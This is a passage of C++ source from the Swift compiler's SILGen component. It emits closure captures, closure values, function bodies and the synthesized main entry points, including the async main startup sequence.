  case CaptureEmission::ImmediateApplication:
    canGuarantee = true;
    break;
  case CaptureEmission::AssignByWrapper:
    canGuarantee = false;
    captureCanEscape = false;
    break;
  }

  auto expansion = getTypeExpansionContext();

  for (auto capture : captureInfo.getCaptures()) {
    if (capture.isDynamicSelfMetadata()) {
      // The parameter type is the static Self type, but the value we
      // want to pass is the dynamic Self type, so upcast it.
      auto dynamicSelfMetatype = MetatypeType::get(
          captureInfo.getDynamicSelfType());
      SILType dynamicSILType = getLoweredType(dynamicSelfMetatype);

      SILValue value = B.createMetatype(loc, dynamicSILType);
      capturedArgs.push_back(ManagedValue::forUnmanaged(value));
      continue;
    }

    if (capture.isOpaqueValue()) {
      // Opaque values are emitted as owned (+1) rvalues.
      OpaqueValueExpr *opaqueValue = capture.getOpaqueValue();
      capturedArgs.push_back(
          emitRValueAsSingleValue(opaqueValue).ensurePlusOne(*this, loc));
      continue;
    }

    auto *vd = cast<VarDecl>(capture.getDecl());
    auto type = FunctionDC->mapTypeIntoContext(
        vd->getInterfaceType());
    auto valueType = FunctionDC->mapTypeIntoContext(
        vd->getValueInterfaceType());

    //
    // If we haven't emitted the captured value yet, we're forming a closure
    // to a local function before all of its captures have been emitted. Eg,
    //
    // func f() { g() }        // transitive capture of 'x'
    // f()                     // closure formed here
    // var x = 123             // 'x' defined here
    // func g() { print(x) }   // 'x' captured here
    //
    auto found = VarLocs.find(vd);
    if (found == VarLocs.end()) {
      // Diagnose the capture-before-declaration, then emit an 'undef' of
      // the correct lowered type so emission can proceed.
      auto &Diags = getASTContext().Diags;

      SourceLoc loc;
      if (closure.kind == SILDeclRef::Kind::DefaultArgGenerator) {
        auto *param = getParameterAt(closure.getDecl(),
                                     closure.defaultArgIndex);
        loc = param->getLoc();
      } else {
        auto f = *closure.getAnyFunctionRef();
        loc = f.getLoc();
      }

      Diags.diagnose(loc, diag::capture_before_declaration,
                     vd->getBaseIdentifier());
      Diags.diagnose(vd->getLoc(), diag::captured_value_declared_here);
      Diags.diagnose(capture.getLoc(), diag::value_captured_here);

      // Emit an 'undef' of the correct type.
      switch (SGM.Types.getDeclCaptureKind(capture, expansion)) {
      case CaptureKind::Constant:
        capturedArgs.push_back(emitUndef(getLoweredType(type)));
        break;
      case CaptureKind::Immutable:
      case CaptureKind::StorageAddress:
        capturedArgs.push_back(emitUndef(getLoweredType(type).getAddressType()));
        break;
      case CaptureKind::Box: {
        auto boxTy = SGM.Types.getContextBoxTypeForCapture(
            vd,
            SGM.Types.getLoweredRValueType(TypeExpansionContext::minimal(),
                                           type),
            FunctionDC->getGenericEnvironmentOfContext(),
            /*mutable*/ true);
        capturedArgs.push_back(emitUndef(boxTy));
        break;
      }
      }
      continue;
    }

    // Get an address value for a SILValue if it is address only in an type
    // expansion context without opaque archetype substitution.
    auto getAddressValue = [&](SILValue entryValue) -> SILValue {
      if (SGM.Types
              .getTypeLowering(
                  valueType,
                  TypeExpansionContext::noOpaqueTypeArchetypesSubstitution(
                      expansion.getResilienceExpansion()))
              .isAddressOnly() &&
          !entryValue->getType().isAddress()) {
        // Spill the loadable value into a temporary so it can be passed
        // by address; the cleanup destroys the copy, not the original.
        auto addr = emitTemporaryAllocation(vd, entryValue->getType());
        auto val = B.emitCopyValueOperation(vd, entryValue);
        auto &lowering = getTypeLowering(entryValue->getType());
        lowering.emitStore(B, vd, val, addr, StoreOwnershipQualifier::Init);
        entryValue = addr;
        enterDestroyCleanup(addr);
      }

      return entryValue;
    };

    auto Entry = found->second;
    switch (SGM.Types.getDeclCaptureKind(capture, expansion)) {
    case CaptureKind::Constant: {
      // let declarations.
      auto &tl = getTypeLowering(valueType);
      SILValue Val = Entry.value;

      if (!Val->getType().isAddress()) {
        // Our 'let' binding can guarantee the lifetime for the callee,
        // if we don't need to do anything more to it.
        if (canGuarantee && !vd->getInterfaceType()->is<ReferenceStorageType>()) {
          auto guaranteed = ManagedValue::forUnmanaged(Val).borrow(*this, loc);
          capturedArgs.push_back(guaranteed);
          break;
        }

        // Just retain a by-val let.
        Val = B.emitCopyValueOperation(loc, Val);
      } else {
        // If we have a mutable binding for a 'let', such as 'self' in an
        // 'init' method, load it.
        Val = emitLoad(loc, Val, tl, SGFContext(), IsNotTake).forward(*this);
      }

      // If we're capturing an unowned pointer by value, we will have just
      // loaded it into a normal retained class pointer, but we capture it as
      // an unowned pointer. Convert back now.
      if (vd->getInterfaceType()->is<ReferenceStorageType>())
        Val = emitConversionFromSemanticValue(loc, Val, getLoweredType(type));

      capturedArgs.push_back(emitManagedRValueWithCleanup(Val));
      break;
    }
    case CaptureKind::Immutable: {
      if (canGuarantee) {
        auto entryValue = getAddressValue(Entry.value);
        // No-escaping stored declarations are captured as the
        // address of the value.
        assert(entryValue->getType().isAddress() && "no address for captured var!");
        capturedArgs.push_back(ManagedValue::forLValue(entryValue));
      }
      else {
        auto entryValue = getAddressValue(Entry.value);
        // We cannot pass a valid SILDebugVariable while creating the temp here
        // See rdar://60425582
        auto addr = B.createAllocStack(loc, entryValue->getType().getObjectType());
        enterDeallocStackCleanup(addr);
        B.createCopyAddr(loc, entryValue, addr, IsNotTake, IsInitialization);
        capturedArgs.push_back(ManagedValue::forLValue(addr));
      }
      break;
    }
    case CaptureKind::StorageAddress: {
      auto entryValue = getAddressValue(Entry.value);
      // No-escaping stored declarations are captured as the
      // address of the value.
      assert(entryValue->getType().isAddress() && "no address for captured var!");
      capturedArgs.push_back(ManagedValue::forLValue(entryValue));
      break;
    }

    case CaptureKind::Box: {
      auto entryValue = getAddressValue(Entry.value);
      // LValues are captured as both the box owning the value and the
      // address of the value.
      assert(entryValue->getType().isAddress() && "no address for captured var!");
      // Boxes of opaque return values stay opaque.
      auto minimalLoweredType = SGM.Types.getLoweredRValueType(
          TypeExpansionContext::minimal(), type->getCanonicalType());
      // If this is a boxed variable, we can use it directly.
      if (Entry.box &&
          entryValue->getType().getASTType() == minimalLoweredType) {
        // We can guarantee our own box to the callee.
        if (canGuarantee) {
          capturedArgs.push_back(
              ManagedValue::forUnmanaged(Entry.box).borrow(*this, loc));
        } else {
          capturedArgs.push_back(emitManagedRetain(loc, Entry.box));
        }
        if (captureCanEscape)
          escapesToMark.push_back(entryValue);
      } else {
        // Address only 'let' values are passed by box.  This isn't great, in
        // that a variable captured by multiple closures will be boxed for each
        // one.  This could be improved by doing an "isCaptured" analysis when
        // emitting address-only let constants, and emit them into an alloc_box
        // like a variable instead of into an alloc_stack.
        //
        // TODO: This might not be profitable anymore with guaranteed captures,
        // since we could conceivably forward the copied value into the
        // closure context and pass it down to the partially applied function
        // in-place.
        // TODO: Use immutable box for immutable captures.
        auto boxTy = SGM.Types.getContextBoxTypeForCapture(
            vd, minimalLoweredType, FunctionDC->getGenericEnvironmentOfContext(),
            /*mutable*/ true);

        AllocBoxInst *allocBox = B.createAllocBox(loc, boxTy);
        ProjectBoxInst *boxAddress = B.createProjectBox(loc, allocBox, 0);
        B.createCopyAddr(loc, entryValue, boxAddress, IsNotTake,
                         IsInitialization);
        if (canGuarantee)
          capturedArgs.push_back(
              emitManagedRValueWithCleanup(allocBox).borrow(*this, loc));
        else
          capturedArgs.push_back(emitManagedRValueWithCleanup(allocBox));
      }

      break;
    }
    }
  }

  // Mark box addresses as captured for DI purposes. The values must have
  // been fully initialized before we close over them.
  if (!escapesToMark.empty()) {
    B.createMarkFunctionEscape(loc, escapesToMark);
  }
}
/// Form a closure value for \p constant, emitting its captures and applying
/// them with a partial_apply when the closure has context.
///
/// \param loc        location to attribute the emitted instructions to.
/// \param constant   the closure or local function being referenced.
/// \param expectedType  the substituted formal type the caller expects.
/// \param subs       substitutions for the closure's generic signature.
/// \param alreadyConverted  when true, skip the orig-to-subst reabstraction.
ManagedValue
SILGenFunction::emitClosureValue(SILLocation loc, SILDeclRef constant,
                                 CanType expectedType,
                                 SubstitutionMap subs,
                                 bool alreadyConverted) {
  auto loweredCaptureInfo = SGM.Types.getLoweredLocalCaptures(constant);

  auto constantInfo = getConstantInfo(getTypeExpansionContext(), constant);
  SILValue functionRef = emitGlobalFunctionRef(loc, constant, constantInfo);
  SILType functionTy = functionRef->getType();

  // Apply substitutions.
  auto pft = constantInfo.SILFnType;

  auto closure = *constant.getAnyFunctionRef();
  auto *dc = closure.getAsDeclContext()->getParent();
  if (dc->isLocalContext() && !loweredCaptureInfo.hasGenericParamCaptures()) {
    // If the lowered function type is not polymorphic but we were given
    // substitutions, we have a closure in a generic context which does not
    // capture generic parameters. Just drop the substitutions.
    subs = { };
  } else if (closure.getAbstractClosureExpr()) {
    // If we have a closure expression in generic context, Sema won't give
    // us substitutions, so we just use the forwarding substitutions from
    // context.
    subs = getForwardingSubstitutionMap();
  }

  bool wasSpecialized = false;
  if (!subs.empty()) {
    auto specialized =
        pft->substGenericArgs(F.getModule(), subs, getTypeExpansionContext());
    functionTy = SILType::getPrimitiveObjectType(specialized);
    wasSpecialized = true;
  }

  // If we're in top-level code, we don't need to physically capture script
  // globals, but we still need to mark them as escaping so that DI can flag
  // uninitialized uses.
  if (this == SGM.TopLevelSGF) {
    auto captureInfo = closure.getCaptureInfo();
    SGM.emitMarkFunctionEscapeForTopLevelCodeGlobals(
        loc, captureInfo);
  }

  // With no captures and no specialization, the bare function reference is
  // the closure value.
  if (loweredCaptureInfo.getCaptures().empty() && !wasSpecialized) {
    auto result = ManagedValue::forUnmanaged(functionRef);
    if (!alreadyConverted)
      result = emitOrigToSubstValue(loc, result,
                                    AbstractionPattern(expectedType),
                                    expectedType);
    return result;
  }

  SmallVector<ManagedValue, 4> capturedArgs;
  emitCaptures(loc, constant, CaptureEmission::PartialApplication,
               capturedArgs);

  // The partial application takes ownership of the context parameters.
  SmallVector<SILValue, 4> forwardedArgs;
  for (auto capture : capturedArgs)
    forwardedArgs.push_back(capture.forward(*this));

  auto calleeConvention = ParameterConvention::Direct_Guaranteed;

  auto toClosure =
    B.createPartialApply(loc, functionRef, subs, forwardedArgs,
                         calleeConvention);
  auto result = emitManagedRValueWithCleanup(toClosure);

  // Get the lowered AST types:
  //  - the original type
  auto origFormalType = AbstractionPattern(constantInfo.LoweredType);

  //  - the substituted type
  auto substFormalType = expectedType;

  // Generalize if necessary.
  if (!alreadyConverted)
    result = emitOrigToSubstValue(loc, result, origFormalType,
                                  substFormalType);

  return result;
}
// Emit SIL for the body of the function declaration \p fd.
void SILGenFunction::emitFunction(FuncDecl *fd) {
  MagicFunctionName = SILGenModule::getMagicFunctionName(fd);

  auto captureInfo = SGM.M.Types.getLoweredLocalCaptures(SILDeclRef(fd));
  auto *body = fd->getTypecheckedBody();
  auto resultTy = fd->getResultInterfaceType();

  emitProfilerIncrement(body);
  emitProlog(captureInfo, fd->getParameters(), fd->getImplicitSelfDecl(), fd,
             resultTy, fd->hasThrows(), fd->getThrowsLoc());

  if (fd->isDistributedActorFactory()) {
    // Distributed actor factory bodies are synthesized rather than emitted
    // from the AST.
    emitDistributedActorFactory(fd);
  } else {
    prepareEpilog(resultTy, fd->hasThrows(), CleanupLocation(fd));
    // Emit the actual function body as usual.
    emitStmt(body);
    emitEpilog(fd);
  }

  mergeCleanupBlocks();
}
// Emit SIL for the body of a closure or autoclosure expression.
void SILGenFunction::emitClosure(AbstractClosureExpr *ace) {
  MagicFunctionName = SILGenModule::getMagicFunctionName(ace);

  SILDeclRef constant(ace);
  OrigFnType = SGM.M.Types.getConstantAbstractionPattern(constant);

  auto resultIfaceTy = ace->getResultType()->mapTypeOutOfContext();
  auto captureInfo = SGM.M.Types.getLoweredLocalCaptures(constant);
  emitProfilerIncrement(ace);
  emitProlog(captureInfo, ace->getParameters(), /*selfParam=*/nullptr,
             ace, resultIfaceTy, ace->isBodyThrowing(), ace->getLoc(),
             SGM.M.Types.getConstantAbstractionPattern(constant));
  prepareEpilog(resultIfaceTy, ace->isBodyThrowing(), CleanupLocation(ace));

  if (auto *ce = dyn_cast<ClosureExpr>(ace)) {
    emitStmt(ce->getBody());
  } else {
    // Autoclosures implicitly return the result of their single body
    // expression.
    auto *autoclosure = cast<AutoClosureExpr>(ace);
    if (B.hasValidInsertionPoint())
      emitReturnExpr(ImplicitReturnLocation(ace),
                     autoclosure->getSingleExpressionBody());
  }

  emitEpilog(ace);
}
// Forward declaration of the createAsyncTask builtin emitter.
// NOTE(review): the definition is not in this chunk — presumably it lives in
// another SILGen translation unit; confirm before relying on it.
ManagedValue emitBuiltinCreateAsyncTask(SILGenFunction &SGF, SILLocation loc,
                                        SubstitutionMap subs,
                                        ArrayRef<ManagedValue> args,
                                        SGFContext C);
/// Emit the body of a compiler-synthesized program entry point.
///
/// \p mainDecl is either the NominalTypeDecl attributed for a UIKit/AppKit
/// main, or the FuncDecl for a type's static main function. Depending on the
/// kind, this emits a call to UIApplicationMain, NSApplicationMain, or the
/// user's main function, followed by the matching return/exit sequence.
void SILGenFunction::emitArtificialTopLevel(Decl *mainDecl) {
// Create the argc and argv arguments.
auto entry = B.getInsertionBB();
auto paramTypeIter = F.getConventions()
.getParameterSILTypes(getTypeExpansionContext())
.begin();
SILValue argc;
SILValue argv;
const bool isAsyncFunc =
isa<FuncDecl>(mainDecl) && static_cast<FuncDecl *>(mainDecl)->hasAsync();
// For an async main, argc/argv function arguments are not materialized here
// (the async start path creates its own arguments; see
// emitAsyncMainThreadStart).
if (!isAsyncFunc) {
argc = entry->createFunctionArgument(*paramTypeIter);
argv = entry->createFunctionArgument(*std::next(paramTypeIter));
}
switch (mainDecl->getArtificialMainKind()) {
case ArtificialMainKind::UIApplicationMain: {
// Emit a UIKit main.
// return UIApplicationMain(C_ARGC, C_ARGV, nil, ClassName);
auto *mainClass = cast<NominalTypeDecl>(mainDecl);
CanType NSStringTy = SGM.Types.getNSStringType();
CanType OptNSStringTy
= OptionalType::get(NSStringTy)->getCanonicalType();
// Look up UIApplicationMain.
// FIXME: Doing an AST lookup here is gross and not entirely sound;
// we're getting away with it because the types are guaranteed to already
// be imported.
ASTContext &ctx = getASTContext();
ImportPath::Element UIKitName =
{ctx.getIdentifier("UIKit"), SourceLoc()};
ModuleDecl *UIKit = ctx
.getClangModuleLoader()
->loadModule(SourceLoc(),
ImportPath::Module(llvm::makeArrayRef(UIKitName)));
assert(UIKit && "couldn't find UIKit objc module?!");
SmallVector<ValueDecl *, 1> results;
UIKit->lookupQualified(UIKit,
DeclNameRef(ctx.getIdentifier("UIApplicationMain")),
NL_QualifiedDefault,
results);
assert(results.size() == 1
&& "couldn't find a unique UIApplicationMain in the UIKit ObjC "
"module?!");
ValueDecl *UIApplicationMainDecl = results.front();
auto mainRef = SILDeclRef(UIApplicationMainDecl).asForeign();
SILGenFunctionBuilder builder(SGM);
auto UIApplicationMainFn =
builder.getOrCreateFunction(mainClass, mainRef, NotForDefinition);
auto fnTy = UIApplicationMainFn->getLoweredFunctionType();
SILFunctionConventions fnConv(fnTy, SGM.M);
// Get the class name as a string using NSStringFromClass.
CanType mainClassTy = mainClass->getDeclaredInterfaceType()
->getCanonicalType();
CanType mainClassMetaty = CanMetatypeType::get(mainClassTy,
MetatypeRepresentation::ObjC);
CanType anyObjectTy = ctx.getAnyObjectType();
CanType anyObjectMetaTy = CanExistentialMetatypeType::get(anyObjectTy,
MetatypeRepresentation::ObjC);
// Build the C-function-pointer SIL type for NSStringFromClass:
// (AnyObject.Type) -> NSString? (autoreleased result).
auto paramConvention = ParameterConvention::Direct_Unowned;
auto params = {SILParameterInfo(anyObjectMetaTy, paramConvention)};
std::array<SILResultInfo, 1> resultInfos = {
SILResultInfo(OptNSStringTy, ResultConvention::Autoreleased)};
auto repr = SILFunctionType::Representation::CFunctionPointer;
auto *clangFnType =
ctx.getCanonicalClangFunctionType(params, resultInfos[0], repr);
auto extInfo = SILFunctionType::ExtInfoBuilder()
.withRepresentation(repr)
.withClangFunctionType(clangFnType)
.build();
auto NSStringFromClassType = SILFunctionType::get(
nullptr, extInfo, SILCoroutineKind::None, paramConvention, params,
/*yields*/ {}, resultInfos, /*error result*/ None, SubstitutionMap(),
SubstitutionMap(), ctx);
auto NSStringFromClassFn = builder.getOrCreateFunction(
mainClass, "NSStringFromClass", SILLinkage::PublicExternal,
NSStringFromClassType, IsBare, IsTransparent, IsNotSerialized,
IsNotDynamic);
auto NSStringFromClass = B.createFunctionRef(mainClass, NSStringFromClassFn);
// Erase the class metatype to AnyObject.Type and call NSStringFromClass
// on it to obtain the optional class-name string.
SILValue metaTy = B.createMetatype(mainClass,
SILType::getPrimitiveObjectType(mainClassMetaty));
metaTy = B.createInitExistentialMetatype(mainClass, metaTy,
SILType::getPrimitiveObjectType(anyObjectMetaTy),
{});
SILValue optNameValue = B.createApply(
mainClass, NSStringFromClass, {}, metaTy);
ManagedValue optName = emitManagedRValueWithCleanup(optNameValue);
// Fix up the string parameters to have the right type.
SILType nameArgTy =
fnConv.getSILArgumentType(3, B.getTypeExpansionContext());
assert(nameArgTy ==
fnConv.getSILArgumentType(2, B.getTypeExpansionContext()));
(void)nameArgTy;
assert(optName.getType() == nameArgTy);
// The other NSString? argument (index 2) is passed as nil.
SILValue nilValue =
getOptionalNoneValue(mainClass, getTypeLowering(OptNSStringTy));
// Fix up argv to have the right type.
auto argvTy = fnConv.getSILArgumentType(1, B.getTypeExpansionContext());
SILType unwrappedTy = argvTy;
if (Type innerTy = argvTy.getASTType()->getOptionalObjectType()) {
auto canInnerTy = innerTy->getCanonicalType();
unwrappedTy = SILType::getPrimitiveObjectType(canInnerTy);
}
auto managedArgv = ManagedValue::forUnmanaged(argv);
// Convert the pointer representation if it differs, then re-wrap in
// Optional if the imported parameter type is optional.
if (unwrappedTy != argv->getType()) {
auto converted =
emitPointerToPointer(mainClass, managedArgv,
argv->getType().getASTType(),
unwrappedTy.getASTType());
managedArgv = std::move(converted).getAsSingleValue(*this, mainClass);
}
if (unwrappedTy != argvTy) {
managedArgv = getOptionalSomeValue(mainClass, managedArgv,
getTypeLowering(argvTy));
}
auto UIApplicationMain = B.createFunctionRef(mainClass, UIApplicationMainFn);
SILValue args[] = {argc, managedArgv.getValue(), nilValue,
optName.getValue()};
B.createApply(mainClass, UIApplicationMain, SubstitutionMap(), args);
// Emit `return 0`, wrapping the Builtin.Int32 literal in the declared
// result struct type if they differ.
SILValue r = B.createIntegerLiteral(mainClass,
SILType::getBuiltinIntegerType(32, ctx), 0);
auto rType =
F.getConventions().getSingleSILResultType(B.getTypeExpansionContext());
if (r->getType() != rType)
r = B.createStruct(mainClass, rType, r);
Cleanups.emitCleanupsForReturn(mainClass, NotForUnwind);
B.createReturn(mainClass, r);
return;
}
case ArtificialMainKind::NSApplicationMain: {
// Emit an AppKit main.
// return NSApplicationMain(C_ARGC, C_ARGV);
auto *mainClass = cast<NominalTypeDecl>(mainDecl);
SILParameterInfo argTypes[] = {
SILParameterInfo(argc->getType().getASTType(),
ParameterConvention::Direct_Unowned),
SILParameterInfo(argv->getType().getASTType(),
ParameterConvention::Direct_Unowned),
};
auto NSApplicationMainType = SILFunctionType::get(
nullptr,
// Should be C calling convention, but NSApplicationMain
// has an overlay to fix the type of argv.
SILFunctionType::ExtInfo::getThin(), SILCoroutineKind::None,
ParameterConvention::Direct_Unowned, argTypes,
/*yields*/ {},
SILResultInfo(argc->getType().getASTType(), ResultConvention::Unowned),
/*error result*/ None, SubstitutionMap(), SubstitutionMap(),
getASTContext());
SILGenFunctionBuilder builder(SGM);
auto NSApplicationMainFn = builder.getOrCreateFunction(
mainClass, "NSApplicationMain", SILLinkage::PublicExternal,
NSApplicationMainType, IsBare, IsTransparent, IsNotSerialized,
IsNotDynamic);
auto NSApplicationMain = B.createFunctionRef(mainClass, NSApplicationMainFn);
SILValue args[] = { argc, argv };
B.createApply(mainClass, NSApplicationMain, SubstitutionMap(), args);
// As in the UIKit case: `return 0`, adapted to the declared result type.
SILValue r = B.createIntegerLiteral(mainClass,
SILType::getBuiltinIntegerType(32, getASTContext()), 0);
auto rType =
F.getConventions().getSingleSILResultType(B.getTypeExpansionContext());
if (r->getType() != rType)
r = B.createStruct(mainClass, rType, r);
B.createReturn(mainClass, r);
return;
}
case ArtificialMainKind::TypeMain: {
// Emit a call to the main static function.
// return Module.$main();
auto *mainFunc = cast<FuncDecl>(mainDecl);
auto moduleLoc = RegularLocation::getModuleLocation();
auto *entryBlock = B.getInsertionBB();
SILDeclRef mainFunctionDeclRef(mainFunc, SILDeclRef::Kind::Func);
SILFunction *mainFunction =
SGM.getFunction(mainFunctionDeclRef, NotForDefinition);
// The main function may be declared on the nominal type itself or in an
// extension of it.
ExtensionDecl *mainExtension =
dyn_cast<ExtensionDecl>(mainFunc->getDeclContext());
NominalTypeDecl *mainType;
if (mainExtension) {
mainType = mainExtension->getExtendedNominal();
} else {
mainType = cast<NominalTypeDecl>(mainFunc->getDeclContext());
}
auto metatype = B.createMetatype(mainType, getLoweredType(mainType->getInterfaceType()));
auto mainFunctionRef = B.createFunctionRef(moduleLoc, mainFunction);
auto builtinInt32Type = SILType::getBuiltinIntegerType(32, getASTContext());
// All control paths branch to `exitBlock`, passing the Int32 exit code
// as a phi argument.
auto *exitBlock = createBasicBlock();
SILValue exitCode =
exitBlock->createPhiArgument(builtinInt32Type, OwnershipKind::None);
B.setInsertionPoint(exitBlock);
if (!mainFunc->hasAsync()) {
// Synchronous main: return the exit code (wrapped in the result struct
// type if necessary).
auto returnType = F.getConventions().getSingleSILResultType(
B.getTypeExpansionContext());
if (exitCode->getType() != returnType)
exitCode = B.createStruct(moduleLoc, returnType, exitCode);
B.createReturn(moduleLoc, exitCode);
} else {
// Async main: call the foreign exit() with the code instead of
// returning; the block ends in unreachable.
FuncDecl *exitFuncDecl = SGM.getExit();
assert(exitFuncDecl && "Failed to find exit function declaration");
SILFunction *exitSILFunc = SGM.getFunction(
SILDeclRef(exitFuncDecl, SILDeclRef::Kind::Func, /*isForeign*/ true),
NotForDefinition);
SILFunctionType &funcType =
*exitSILFunc->getLoweredType().getAs<SILFunctionType>();
SILType retType = SILType::getPrimitiveObjectType(
funcType.getParameters().front().getInterfaceType());
exitCode = B.createStruct(moduleLoc, retType, exitCode);
SILValue exitCall = B.createFunctionRef(moduleLoc, exitSILFunc);
B.createApply(moduleLoc, exitCall, {}, {exitCode});
B.createUnreachable(moduleLoc);
}
if (mainFunc->hasThrows()) {
// Throwing main: try_apply with a success block (exit code 0) and a
// failure block that logs the error and exits with code 1.
auto *successBlock = createBasicBlock();
B.setInsertionPoint(successBlock);
successBlock->createPhiArgument(SGM.Types.getEmptyTupleType(),
OwnershipKind::None);
SILValue zeroReturnValue =
B.createIntegerLiteral(moduleLoc, builtinInt32Type, 0);
B.createBranch(moduleLoc, exitBlock, {zeroReturnValue});
auto *failureBlock = createBasicBlock();
B.setInsertionPoint(failureBlock);
SILValue error = failureBlock->createPhiArgument(
SILType::getExceptionType(getASTContext()), OwnershipKind::Owned);
// Log the error.
B.createBuiltin(moduleLoc, getASTContext().getIdentifier("errorInMain"),
SGM.Types.getEmptyTupleType(), {}, {error});
B.createEndLifetime(moduleLoc, error);
SILValue oneReturnValue =
B.createIntegerLiteral(moduleLoc, builtinInt32Type, 1);
B.createBranch(moduleLoc, exitBlock, {oneReturnValue});
B.setInsertionPoint(entryBlock);
B.createTryApply(moduleLoc, mainFunctionRef, SubstitutionMap(),
{metatype}, successBlock, failureBlock);
} else {
// Non-throwing main: plain apply, then branch to exit with code 0.
B.setInsertionPoint(entryBlock);
B.createApply(moduleLoc, mainFunctionRef, SubstitutionMap(), {metatype});
SILValue returnValue =
B.createIntegerLiteral(moduleLoc, builtinInt32Type, 0);
B.createBranch(moduleLoc, exitBlock, {returnValue});
}
return;
}
}
}
/// Emit the synchronous start sequence for an async main entry point:
/// create an async task wrapping \p entryPoint, run the task's initial job
/// on the main executor via swift_job_run, then enter the async main drain
/// queue, which does not return (the block ends in unreachable).
void SILGenFunction::emitAsyncMainThreadStart(SILDeclRef entryPoint) {
auto moduleLoc = RegularLocation::getModuleLocation();
auto *entryBlock = B.getInsertionBB();
auto paramTypeIter = F.getConventions()
.getParameterSILTypes(getTypeExpansionContext())
.begin();
// The C entry-point arguments are accepted but not otherwise used here.
entryBlock->createFunctionArgument(*paramTypeIter); // argc
entryBlock->createFunctionArgument(*std::next(paramTypeIter)); // argv
// Lookup necessary functions
swift::ASTContext &ctx = entryPoint.getDecl()->getASTContext();
B.setInsertionPoint(entryBlock);
// Wrap a builtin value in the struct type expected by parameter
// `paramIndex` of `fd`, when the two types differ; otherwise pass it
// through unchanged.
auto wrapCallArgs = [this, &moduleLoc](SILValue originalValue, FuncDecl *fd,
uint32_t paramIndex) -> SILValue {
Type parameterType = fd->getParameters()->get(paramIndex)->getType();
SILType paramSILType = SILType::getPrimitiveObjectType(parameterType->getCanonicalType());
// If the types are the same, we don't need to do anything!
if (paramSILType == originalValue->getType())
return originalValue;
return this->B.createStruct(moduleLoc, paramSILType, originalValue);
};
// Call CreateAsyncTask
FuncDecl *builtinDecl = cast<FuncDecl>(getBuiltinValueDecl(
getASTContext(),
ctx.getIdentifier(getBuiltinName(BuiltinValueKind::CreateAsyncTask))));
auto subs = SubstitutionMap::get(builtinDecl->getGenericSignature(),
{TupleType::getEmpty(ctx)},
ArrayRef<ProtocolConformanceRef>{});
SILValue mainFunctionRef = emitGlobalFunctionRef(moduleLoc, entryPoint);
// Emit the CreateAsyncTask builtin
TaskCreateFlags taskCreationFlagMask(0);
taskCreationFlagMask.setInheritContext(true);
SILValue taskFlags =
emitWrapIntegerLiteral(moduleLoc, getLoweredType(ctx.getIntType()),
taskCreationFlagMask.getOpaqueValue());
SILValue task =
emitBuiltinCreateAsyncTask(*this, moduleLoc, subs,
{ManagedValue::forUnmanaged(taskFlags),
ManagedValue::forUnmanaged(mainFunctionRef)},
{})
.forward(*this);
// The builtin returns a tuple; element 0 is the task itself.
DestructureTupleInst *structure = B.createDestructureTuple(moduleLoc, task);
task = structure->getResult(0);
// Get swiftJobRun
FuncDecl *swiftJobRunFuncDecl = SGM.getSwiftJobRun();
assert(swiftJobRunFuncDecl && "Failed to find swift_job_run function decl");
SILFunction *swiftJobRunSILFunc =
SGM.getFunction(SILDeclRef(swiftJobRunFuncDecl, SILDeclRef::Kind::Func),
NotForDefinition);
SILValue swiftJobRunFunc =
B.createFunctionRefFor(moduleLoc, swiftJobRunSILFunc);
// Convert task to job
SILType JobType = SILType::getPrimitiveObjectType(
getBuiltinType(ctx, "Job")->getCanonicalType());
SILValue jobResult = B.createBuiltin(
moduleLoc,
ctx.getIdentifier(getBuiltinName(BuiltinValueKind::ConvertTaskToJob)),
JobType, {}, {task});
jobResult = wrapCallArgs(jobResult, swiftJobRunFuncDecl, 0);
// Get main executor
FuncDecl *getMainExecutorFuncDecl = SGM.getGetMainExecutor();
if (!getMainExecutorFuncDecl) {
// If it doesn't exist due to an SDK-compiler mismatch, we can conjure one
// up instead of crashing:
// @available(SwiftStdlib 5.1, *)
// @_silgen_name("swift_task_getMainExecutor")
// internal func _getMainExecutor() -> Builtin.Executor
ParameterList *emptyParams = ParameterList::createEmpty(getASTContext());
getMainExecutorFuncDecl = FuncDecl::createImplicit(
getASTContext(), StaticSpellingKind::None,
DeclName(
getASTContext(),
DeclBaseName(getASTContext().getIdentifier("_getMainExecutor")),
/*Arguments*/ emptyParams),
{}, /*async*/ false, /*throws*/ false, {}, emptyParams,
getASTContext().TheExecutorType,
entryPoint.getDecl()->getModuleContext());
getMainExecutorFuncDecl->getAttrs().add(
new (getASTContext())
SILGenNameAttr("swift_task_getMainExecutor", /*implicit*/ true));
}
SILFunction *getMainExeutorSILFunc = SGM.getFunction(
SILDeclRef(getMainExecutorFuncDecl, SILDeclRef::Kind::Func),
NotForDefinition);
SILValue getMainExeutorFunc =
B.createFunctionRefFor(moduleLoc, getMainExeutorSILFunc);
SILValue mainExecutor = B.createApply(moduleLoc, getMainExeutorFunc, {}, {});
mainExecutor = wrapCallArgs(mainExecutor, swiftJobRunFuncDecl, 1);
// Run first part synchronously
B.createApply(moduleLoc, swiftJobRunFunc, {}, {jobResult, mainExecutor});
// Start Main loop!
FuncDecl *drainQueueFuncDecl = SGM.getAsyncMainDrainQueue();
if (!drainQueueFuncDecl) {
// If it doesn't exist, we can conjure one up instead of crashing
// @available(SwiftStdlib 5.5, *)
// @_silgen_name("swift_task_asyncMainDrainQueue")
// internal func _asyncMainDrainQueue() -> Never
ParameterList *emptyParams = ParameterList::createEmpty(getASTContext());
drainQueueFuncDecl = FuncDecl::createImplicit(
getASTContext(), StaticSpellingKind::None,
DeclName(
getASTContext(),
DeclBaseName(getASTContext().getIdentifier("_asyncMainDrainQueue")),
/*Arguments*/ emptyParams),
{}, /*async*/ false, /*throws*/ false, {}, emptyParams,
getASTContext().getNeverType(),
entryPoint.getDecl()->getModuleContext());
drainQueueFuncDecl->getAttrs().add(new (getASTContext()) SILGenNameAttr(
"swift_task_asyncMainDrainQueue", /*implicit*/ true));
}
SILFunction *drainQueueSILFunc = SGM.getFunction(
SILDeclRef(drainQueueFuncDecl, SILDeclRef::Kind::Func), NotForDefinition);
SILValue drainQueueFunc =
B.createFunctionRefFor(moduleLoc, drainQueueSILFunc);
B.createApply(moduleLoc, drainQueueFunc, {}, {});
// The drain queue returns Never, so the function ends in unreachable.
B.createUnreachable(moduleLoc);
return;
}
/// Emit a function whose body is the evaluation of a single expression:
/// default-argument generators, stored-property initializers, and property
/// wrapper backing / init-from-projected-value initializers.
///
/// \p value is the expression to evaluate and return.
/// \p EmitProfilerIncrement controls whether a PGO region-counter increment
/// is emitted for the expression.
void SILGenFunction::emitGeneratorFunction(SILDeclRef function, Expr *value,
bool EmitProfilerIncrement) {
auto *dc = function.getDecl()->getInnermostDeclContext();
